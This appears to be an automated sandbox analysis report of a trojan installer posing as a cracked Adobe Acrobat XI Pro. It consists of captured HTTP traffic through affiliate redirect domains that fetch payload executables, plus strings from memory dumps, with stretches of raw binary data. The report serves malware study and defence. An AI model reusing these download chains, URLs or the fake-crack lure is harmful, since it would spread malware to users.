X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:30 GMT

Content-Length: 0

HTTP/1.1 200 OK..Content-Type: text/html..Server: Microsoft-IIS/8.5..X-Powered-By: PHP/5.3.28..Date: Sun, 27 Nov 2016 15:37:30 GMT..Content-Length: 0..

GET hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: will.ymuscaesnortin.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 5248

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Date: Sun, 27 Nov 2016 15:37:22 GMT

X-Cache: Miss from cloudfront

Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)

X-Amz-Cf-Id: l1my4O3razMEiR5YydeNmDYHWI5pPOfTnr-Yh5bIzfchTkSNUDbItg==

h.......z*Z..-..p.`...i...tg...N....D.@.D^.}D.c..;Y..k.......(...i........o...A....,B.>..........ocZ..........2O.......K..Re.....4.y....\!....4....h...f.^...2.........Uj....-*;Zr.L.$K..A.3.B.e....\>./......."H'..p.>A>..>....(...-/.7X...h.90.OO..1....@.^#}....).z....~I.z4.7p.9.'...1..p..lb..cT.AX9aN..L........g.."q0oU(...c....Y|...n.......x......$q.=.9.,..|.k^OF~....i.0....gnV......$n.i.I>*.#......B<k..k,i.R..,.....:......OA.zE6*Q.1.`.F.T.v......A..I....G.....x..7kH.. .Z....f`.jb.y}".........e.mUd...,."...&...=g.....ia..3. ,....."uDT...!..`..U;u3&...\1#..m..~d..1.....D;.n0...$....)L..C[..F.........ezn].`.w.R... ..U.......@MSmF..v"|...]..w.v.YjZ...1|pD.q........@....>......U3...4l..>P.-..........J....."..a.....@0..-.`..G...TB..Bb..%pC.5d..`.I.<.r\....V.W....G......p...v%!...@#..2... T....F.X...g.....:/.2XDQa..rmA..........#....].Yv..d].......R..|...............W{..>..JA..n.[1..o".C.K....f./$X-..A.."ui.b....@..#:OzhS...Gd..u.rJl1d.h .)d.........%8 ...}.O.K<.........S.......Vf...il.F.h..(...6Z..."J1.T.E.'A.gVm*...&.1E....$...sf.g...._.N..f"....y7.H..V.......Q.s.=.....B.d31%.=....0.Y..0.....t...g.c..B.../Q..$..h&=..BLB.........l..@..ffc1..B.6.....)...g0.__.....?....u....9.^..*....,..........*U...n...!.q.......&.h>.-u.I..pn..$fA.|....Wf.n.8.._...a/K&.(...^.8.$......5.'@K_.MB>....O...t......%$.sM5d7..._.;.{...T)}...c.......Z.~.W.......V...c.~.~y-..K0 ......&..d..{u...d.nwn..2.....#!.f5..(..$8.C...}....S...B.P.F]{UyU9.4.......0v.w.[do..@...^....p1..l^3&[......*.[.jj.b.$...5..{.

<<< skipped >>>

GET /?affId=1006&appTitle=Adobe%20Acrobat%20XI%20Pro%2011.0.18%20M&s1=2735&s2=10958132&setupName=cpSetup&appVersion=2.92&instId=11&exe=1 HTTP/1.0

Host: get.ynoptisticglob.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 302 Moved Temporarily

Content-Type: text/html

Connection: close

Server: nginx/1.10.1

Date: Sun, 27 Nov 2016 15:38:10 GMT

X-Powered-By: PHP/5.4.16

Location: hXXp://away.yosauruslega.bid/get.php?ses=482796663418412224

X-Cache: Miss from cloudfront

Via: 1.1 3ef066dcf359ad5dbc339df978147194.cloudfront.net (CloudFront)

X-Amz-Cf-Id: RMWwWYPKPbgGnBwxbKPHR9ahWyMUS2Lgqtmka11YcIwRIWnNjdqqJQ==

GET /redirect?ad_unit=64&aid=A3097212614-1055013556-759180181&ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&var3=9999 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ads.affbuzzads.com

Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sun, 27 Nov 2016 15:38:42 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Sun, 27 Nov 2016 15:38:42 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0..0..

GET hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=2735&aff_sub2=10958132&aff_sub3=&aff_sub4=&aff_sub5=1352224761&url=http://will.ymuscaesnortin.bid/offer.php?affId={aff_id}&trackingId=139867460&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1

Host: win.ketydesmidiana.bid

Connection: close

Accept: */*

User-Agent: InstallCapital

HTTP/1.1 302 Found

Cache-Control: no-cache, no-store, must-revalidate

Content-Type: text/html; charset=iso-8859-1

Date: Sun, 27 Nov 2016 15:38:13 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2

P3P: CP="NOI CUR OUR NOR INT"

Pragma: no-cache

Server: nginx/1.7.9

Set-Cookie: enc_aff_session_4=ENC02734-1024c893cfbfff9cc18408df1cefd7-1006-4-0-0-0-0-UA-0-3131-32373335-3130393538313332-_-_-31333532323234373631-194.242.96.226-20161127103813-_-05006D112A1D243C70397465550C64525E4D096750152358604977030A45533D7834601B4D480F741D; expires=Tue, 27 Dec 2016 15:38:13 GMT; path=/;

Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 23 Oct 2019 02:18:13 GMT; path=/;

tracking_id: 1024c893cfbfff9cc18408df1cefd7

X-Robots-Tag: noindex, nofollow

Content-Length: 453

Connection: Close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://will.ymuscaesnortin.bid/offer.php?affId=1006&trackingId=139867460&instId=11&ho_trackingid=1024c893cfbfff9cc18408df1cefd7&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a>.</p>.</body></html>...

<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 19:16:52 GMT

Expires: Mon, 28 Nov 2016 19:16:52 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 246112

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:16:52 GMT..Expires: Mon, 28 Nov 2016 19:16:52 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 246112..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."........

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 20:12:58 GMT

Expires: Mon, 28 Nov 2016 20:12:58 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 242748

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:58 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 242748..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....

GET /r/collect?v=1&_v=j47&a=561957627&t=pageview&_s=1&dl=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&dp=http://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0&ul=en-us&de=utf-8&dt=EN Movie Player TWIN&sd=24-bit&sr=1916x902&vp=1173x539&je=1&fl=23.0 r0&_u=AEAAAEAAI~&jid=2066430644&cid=1439064958.1480261126&tid=UA-13179523-2&_r=1&z=2067671186 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.google-analytics.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Date: Sun, 27 Nov 2016 15:38:47 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, no-store, must-revalidate

Last-Modified: Sun, 17 May 1998 03:00:00 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

Server: Golfe2

Content-Length: 35

GIF89a.............,...........D..;HTTP/1.1 200 OK..Access-Control-Allow-Origin: *..Date: Sun, 27 Nov 2016 15:38:47 GMT..Pragma: no-cache..Expires: Fri, 01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, no-store, must-revalidate..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options: nosniff..Content-Type: image/gif..Server: Golfe2..Content-Length: 35..GIF89a.............,...........D..;..

GET /appImg.jpg HTTP/1.1

Accept: */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: d2adi7hu49xk5t.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/jpeg

Content-Length: 4628

Connection: keep-alive

Date: Thu, 22 Sep 2016 18:01:12 GMT

Last-Modified: Mon, 13 Jun 2016 11:29:06 GMT

ETag: "ba6c4124ad5d33528fe1d609e6ac1ff0"

Accept-Ranges: bytes

Server: AmazonS3

Age: 74433

X-Cache: Hit from cloudfront

Via: 1.1 616f617776e843142ab5d87231cb3526.cloudfront.net (CloudFront)

X-Amz-Cf-Id: eXOPAKCBYjP73UFpmlKl_Stk7IsY9FpCsFHwDlzEkoSBu4TrH411fQ==

......Exif..II*.................Ducky.......<.....3hXXp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.146729, 2012/05/03-13:40:03 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop Elements 12.0 Windows" xmpMM:InstanceID="xmp.iid:E39F75D6F49A11E4B7DAEACD8AA72C6E" xmpMM:DocumentID="xmp.did:E39F75D7F49A11E4B7DAEACD8AA72C6E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E39F75D4F49A11E4B7DAEACD8AA72C6E" stRef:documentID="xmp.did:E39F75D5F49A11E4B7DAEACD8AA72C6E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.................................................................................................................................................K.G........................................................................................!..1AQa.."R.T.q24D.%...B#dEU'.bSc.5u&C$t.67(.....................!1AQa..."2BR.q...b....rS.......#............?.<fnfHr.B..v.......ddD.P.Q5.(.(t.....%.KH....,...@L..f.|?..4G.....[......b.......).4_....=.<.....o.....}....6..3D....w........u.{..e.(...yN..f..sr......}...G.o......G\...-TBL.<fex.=.;...u.;..vO6..}.:p...^"x...G.s...k.=....../.t....xg.4O..^..e..z

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_3584:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

p&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B->C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\setup.exe

venzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B

etc.dll

version="0.5.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

true

8 8$8(8,808

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps